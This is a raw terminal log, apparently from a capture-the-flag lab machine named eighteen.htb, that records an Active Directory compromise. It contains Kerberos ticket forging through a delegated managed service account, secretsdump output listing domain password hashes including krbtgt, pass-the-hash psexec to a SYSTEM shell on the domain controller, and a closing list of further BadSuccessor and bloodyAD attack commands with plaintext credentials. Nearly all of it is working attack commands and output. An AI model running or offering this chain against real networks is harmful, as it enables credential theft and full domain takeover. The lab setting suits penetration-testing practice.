SMB 10.10.11.95 445 DC01 [+] eighteen.htb\attacker_dMSA$:16bf641def118ba70c1d5a3d6b6baa5d
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# export KRB5CCNAME='attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 getST.py -dc-ip 10.10.11.95 -spn 'cifs/DC01.eighteen.htb' 'eighteen.htb/attacker_dmsa$' -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:88 ... OK
[*] Saving ticket in attacker_dmsa$@cifs_DC01.eighteen.htb@EIGHTEEN.HTB.ccache
export KRB5CCNAME='attacker_dmsa$@cifs_DC01.eighteen.htb@EIGHTEEN.HTB.ccache'
proxychains4 python3 secretsdump.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 secretsdump.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[SNIP]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
Pwn$:12102:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
attacker_dMSA$:12104:aad3b435b51404eeaad3b435b51404ee:16bf641def118ba70c1d5a3d6b6baa5d:::
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 psexec.py -hashes :0b133be956bfaddf9cea56701affddec administrator@eighteen.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[*] Requesting shares on eighteen.htb.....
[*] Found writable share ADMIN$
[*] Uploading file XOfnGGpW.exe
[*] Opening SVCManager on eighteen.htb.....
[*] Creating service NEtR on eighteen.htb.....
[*] Starting service NEtR.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
Microsoft Windows [Version 10.0.26100.4349]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32> hostname
DC01
proxychains4 psexec.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 psexec.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[*] Requesting shares on DC01.eighteen.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RiLWsdMX.exe
[*] Opening SVCManager on DC01.eighteen.htb.....
[*] Creating service zZAJ on DC01.eighteen.htb.....
[*] Starting service zZAJ.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
Microsoft Windows [Version 10.0.26100.4349]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is E154-392A
Directory of C:\Users\Administrator\Desktop
11/10/2025 04:39 PM <DIR> .
11/10/2025 02:15 PM <DIR> ..
12/24/2025 09:02 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,497,720,832 bytes free
C:\Users\Administrator\Desktop> type root.txt
84c21df5d97770614f050c9584065cdf
ROOT.TXT: 84c21df5d97770614f050c9584065cdf
OTHER EXPLOITS ATTEMPTS: MAY WORKS BUT WHO KNOW ?
proxychains4 python3 badsuccessor.py -dmsa-name webadmin -target-ou 'OU=Staff,DC=eighteen,DC=htb' -dc-ip 10.10.11.95 -dc-host dc01.eighteen.htb -method LDAP eighteen.htb/adam.scott:iloveyou1
proxychains4 python3 badsuccessor.py -dmsa-name webadmin -target-ou 'OU=Staff,DC=eighteen,DC=htb' -action add -target-account Administrator -dc-ip 10.10.11.95 -dc-host dc01.eighteen.htb -method LDAP eighteen.htb/adam.scott:iloveyou1
proxychains4 python3 getST.py 'eighteen.htb/adam.scott:iloveyou1' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
proxychains4 python3 secretsdump.py 'attacker_dMSA$'@eighteen.htb -hashes :5197b8c62290d67df48a5c447f4bcc2e -just-dc
proxychains4 bloodyAD -d dc01.eighteen.htb -u adam.scott -p iloveyou1 --host dc01.eighteen.htb get writable --detail
proxychains4 bloodyAD -d dc01.eighteen.htb -u adam.scott -p iloveyou1 --host dc01.eighteen.htb add badSuccessor dmsa_pwn
bloodyAD -d tryhackme.local -u 'tbyte' -p 'P@SSw0rd345' - host DC-LAB2025–01.tryhackme.local add badSuccessor pentest2_dmsa
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows